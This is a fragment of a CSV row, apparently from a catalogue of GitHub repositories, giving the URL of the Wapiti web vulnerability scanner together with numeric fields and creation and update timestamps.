Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"